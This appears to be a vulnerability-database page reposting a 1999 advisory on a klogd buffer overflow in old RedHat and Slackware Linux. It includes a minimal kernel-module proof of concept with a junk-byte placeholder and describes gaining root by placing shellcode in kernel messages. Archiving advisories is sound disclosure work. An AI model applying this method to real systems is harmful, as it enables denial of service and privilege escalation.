RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 – ‘klogd’ Local Buffer Overflow (1)
漏洞ID | 1053386 | 漏洞类型 | |
发布时间 | 1999-02-26 | 更新时间 | 1999-02-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/398/info
It is possible to cause a denial of service (remote and local) through generating old, obscure kernel messages (not terminated with n) in klogd. The problem exists because of a buffer overflow in the klogd handling of kernel messages. It is possible to gain local root access through stuffing shellcode into printk() messages which contain user-controllable variables (eg, filenames). What makes this problem strange, however, is that it was fixed two years ago. Two of the most mainstream linux distributions (Slackware Linux and RedHat Linux), up until recently, are known to have been shipping with the very old vulnerable version. Fixes and updates were released promptly. There is no data on other distributions.
The following "exploit" is a small module you can use to try and exploit the problem on your machine.
-- gcc -c -O3 test.c; insmod test; rmmod test --
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/malloc.h>
#include <asm/unistd.h>
#include <linux/version.h>
#include <asm/string.h>
int init_module(void) {
printk("INSERT_ABOUT_2000_BYTES_OF_JUNK_HEREn");
return 0;
}
Klogd Exploit Using Envcheck by Esa Etelavuori <[email protected]>
Release Date: 20000925
GNU libc2 Vulnerability 漏洞ID 1105006 漏洞类型 Boundary Condition Error 发布时间 1997-12-16 更新时间 1997-12-16 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666